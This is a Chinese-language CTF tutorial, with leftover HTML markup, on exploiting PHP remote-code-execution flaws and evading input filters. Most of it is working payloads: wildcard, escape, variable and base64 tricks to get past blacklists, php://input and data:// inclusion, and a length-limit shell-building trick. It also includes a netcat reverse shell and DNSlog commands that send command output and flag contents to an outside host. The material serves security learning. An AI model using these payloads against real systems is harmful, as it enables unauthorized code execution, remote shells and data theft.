CTF中的RCE漏洞利用与绕过技术详解<\/h1>

1. RCE基本概念<\/h2>

RCE (Remote Code Execution)远程代码执行漏洞分为两类：<\/p>

远程代码执行<\/strong>：远程执行PHP等编程语言代码<\/li>

远程命令执行<\/strong>：远程执行系统命令（Linux\/Windows等）<\/li> <\/ul>
2. 常见危险函数<\/h2>
PHP危险函数<\/h3>

代码执行：eval()<\/code>, assert()<\/code>, preg_replace()<\/code>, call_user_func()<\/code>, call_user_func_array()<\/code>, array_map()<\/code><\/li>
命令执行：system()<\/code>, shell_exec()<\/code>, popen()<\/code>, passthru()<\/code>, proc_open()<\/code><\/li> <\/ul> Python危险函数<\/h3> eval<\/code>, exec<\/code>, subprocess<\/code>, os.system<\/code>, commands<\/code><\/li> <\/ul> Java危险函数<\/h3> 基于反射机制的表达式引擎：OGNL, SpEL, MVEL<\/li> <\/ul> 3. 常见绕过技术<\/h2> 3.1 通配符(*)绕过<\/h3> <?<\/span>php<\/span> <\/span><\/span>$c =<\/span> $_GET['c'<\/span>]; <\/span><\/span>if<\/span>(!<\/span>preg_match<\/span>("\/flag\/i"<\/span>,$c)) { <\/span><\/span> eval<\/span>($c); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>绕过方法：<\/p> cat fla*.php<\/code><\/li> tac fla*php<\/code><\/li> <\/ul> 3.2 函数替代绕过<\/h3> <?<\/span>php<\/span> <\/span><\/span>$c =<\/span> $_GET['c'<\/span>]; <\/span><\/span>if<\/span>(!<\/span>preg_match<\/span>("\/flag|system|php\/i"<\/span>,$c)) { <\/span><\/span> eval<\/span>($c); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>绕过payload：<\/p> url?c=echo shell_exec('tac\/cat fla*'); <\/code><\/pre> 3.3 参数逃逸<\/h3> <?<\/span>php<\/span> <\/span><\/span>$c =<\/span> $_GET['c'<\/span>]; <\/span><\/span>if<\/span>(!<\/span>preg_match<\/span>("\/flag|system|php|cat|sort|shell|\.| |\/i"<\/span>,$c)) { <\/span><\/span> eval<\/span>($c); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>绕过方法：<\/p> url?c=eval($_GET['a']);&a=cat flag.php; <\/code><\/pre> 3.4 管道符绕过<\/h3> Windows管道符<\/h4> |<\/code>：直接执行后面语句<\/li> ||<\/code>：前面执行失败则执行后面<\/li> &<\/code>：两个都执行<\/li> &&<\/code>：前面为真则都执行<\/li> <\/ul> Linux管道符<\/h4> |<\/code>：显示后面语句的结果<\/li> ||<\/code>：前面出错则执行后面<\/li> &<\/code>：两个都执行<\/li> &&<\/code>：前面出错则不执行后面<\/li> `<\/code>：将括号内命令处理完毕后再执行<\/li> ;<\/code>：执行完前面执行后面<\/li> <\/ul> 3.5 文件包含+伪协议<\/h3> <?<\/span>php<\/span> <\/span><\/span>$c =<\/span> $_GET['c'<\/span>]; <\/span><\/span>if<\/span>(!<\/span>preg_match<\/span>("\/flag|system|php|cat|sort|shell|echo|\;(\/i"<\/span>,$c)) { <\/span><\/span> eval<\/span>($c); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>绕过方法：<\/p> url?c=include$_GET[a]?>&a=data:\/\/text\/plain,<?tac fla*?> <\/code><\/pre> 其他协议：<\/p> url?c=include[a]?>&a=php;\/\/filter\/read=convert.base64-encode\/resource=flag.php<\/code><\/li> url?c=include$_GETa]?>&a=php:\/\/input<\/code> + POST: <?php system('tac flag.php');?><\/code><\/li> <\/ol> 4. 关键字绕过技术<\/h2> 4.1 空格绕过<\/h3> 替代方案：<\/p> <<\/code>, <><\/code><\/li> ${IFS}<\/code>, $IFS<\/code><\/li> %20<\/code>(space), %09<\/code>(tab)<\/li> $IFS$9<\/code>, $IFS$1<\/code><\/li> <\/ul> 示例：<\/p> cat<flag.php <\/span><\/span>cat<>flag.php <\/span><\/span>cat$IFSflag.php <\/span><\/span>cat${<\/span>IFS}<\/span>flag.php <\/span><\/span>cat%20flag.php <\/span><\/span>cat%09flag.php <\/span><\/span>cat$IFS$1flag.php <\/span><\/span><\/code><\/pre>4.2 转义绕过<\/h3> 示例：<\/p> ca\t<\/span> fl\a<\/span>g <\/span><\/span>ca"t flag <\/span><\/span><\/span>ca't flag <\/span><\/span><\/span><\/code><\/pre>4.3 特殊变量绕过<\/h3> 使用shell特殊变量：<\/p> ca$*t flag.php <\/span><\/span>ca$@t flag.php <\/span><\/span>ca$xt flag.php <\/span><\/span>ca${<\/span>X}<\/span>t flag.php <\/span><\/span><\/code><\/pre>4.4 正则表达式绕过<\/h3> 使用通配符和特殊匹配：<\/p> fla* <\/span><\/span>?la* <\/span><\/span><\/code><\/pre>4.5 Base64编码绕过<\/h3> 示例：<\/p> echo 'ls'<\/span> | base64 # 输出: bHMK<\/span> <\/span><\/span>`<\/span>echo 'bHMK'<\/span> | base64 -d`<\/span> # 执行: ls<\/span> <\/span><\/span><\/code><\/pre>4.6 字符串拼接<\/h3> 示例：<\/p> a=<\/span>fl;b=<\/span>ag;cat$IFS$a$b; <\/span><\/span><\/code><\/pre>5. 命令执行函数绕过<\/h2> 5.1 内联执行<\/h3> 127.0.0.1;cat$IFS$!`<\/span>ls`<\/span> <\/span><\/span>echo $(<\/span>ls)<\/span>; <\/span><\/span>?><?=<\/span>`<\/span>ls1; <\/span><\/span>?><?=<\/span>$(<\/span>ls)<\/span>; <\/span><\/span><\/code><\/pre>5.2 替代函数<\/h3> 可用函数：<\/p> system()<\/code><\/li> passthru()<\/code><\/li> exec()<\/code><\/li> popen()<\/code><\/li> proc_open()<\/code><\/li> pcntl_exec()<\/code><\/li> highlight_file()<\/code><\/li> <\/ul> 5.3 文件读取替代方法<\/h3> curl file:\/\/\/flag <\/span><\/span>strings flag <\/span><\/span>uniq -c flag <\/span><\/span>bash -v flag <\/span><\/span>rev flag <\/span><\/span>tac flag <\/span><\/span>find . -name flag <\/span><\/span><\/code><\/pre>6. 字符串长度限制绕过<\/h2> 示例payload：<\/p> touch "ag"<\/span> <\/span><\/span>touch "fl\\"<\/span> <\/span><\/span>touch "t \\"<\/span> <\/span><\/span>touch "ca\\"<\/span> <\/span><\/span>ls -t > shell <\/span><\/span>sh shell <\/span><\/span><\/code><\/pre>解释：<\/p> 创建特殊文件名文件<\/li> 按时间排序写入shell文件<\/li> 执行shell文件<\/li> <\/ol> 7. 环境变量绕过($PATH)<\/h2> 利用环境变量截取字符：<\/p> echo ${<\/span>PATH:2:1}<\/span> # 从第2位开始截取1个字符<\/span> <\/span><\/span><\/code><\/pre>自定义PATH：<\/p> export PATH=<\/span>$PATH:\/abcdefghijklmn\/opq\/rst\/uvw\/xyz\/0123456789 <\/span><\/span><\/code><\/pre>8. 无回显RCE处理<\/h2> 8.1 测试方法<\/h3> sleep<\/code>测试：url?c=ls;sleep 3<\/code><\/li> HTTP\/DNS请求测试<\/li> <\/ul> 8.2 反弹Shell<\/h3> nc -e \/bin\/sh ip port <\/span><\/span><\/code><\/pre>8.3 DNSlog利用<\/h3> 原理：通过DNS请求记录传递信息<\/p> 示例：<\/p> curl http:\/\/ip.port.exp.ceye.io\/`<\/span>whoami`<\/span> <\/span><\/span>ping `<\/span>whoami`<\/span>.ip.port.exp.ceye.io <\/span><\/span><\/code><\/pre>实战案例：<\/p> <?<\/span>php<\/span> <\/span><\/span>error_reporting<\/span>(0<\/span>); <\/span><\/span>highlight_file<\/span>(__FILE__<\/span>); <\/span><\/span>function<\/span> strCheck<\/span>($cmd){ <\/span><\/span> if<\/span>(!<\/span>preg_match<\/span>("\/\;|<\/span>\x09<\/span>|<\/span>\x26<\/span>|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag\/i"<\/span>, $cmd)){ <\/span><\/span> return<\/span>($cmd); <\/span><\/span> } else<\/span>{ <\/span><\/span> die<\/span>("i hate this"<\/span>); <\/span><\/span> } <\/span><\/span>} <\/span><\/span>$cmd=<\/span>$_GET['cmd'<\/span>]; <\/span><\/span>strCheck<\/span>($cmd); <\/span><\/span>shell_exec<\/span>($cmd); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>绕过payload：<\/p> url?cmd=curl `cat \/fla*`.域名 <\/code><\/pre> 9. 总结<\/h2> 本文详细介绍了CTF中RCE漏洞的各种利用和绕过技术，包括：<\/p> 基础概念和危险函数<\/li> 多种绕过技术（通配符、参数逃逸、管道符等）<\/li> 关键字绕过方法<\/li> 无回显RCE处理方法<\/li> 实际案例和payload示例<\/li> <\/ul> 掌握这些技术对于CTF比赛和渗透测试至关重要，但请务必在合法授权范围内使用这些技术。<\/p>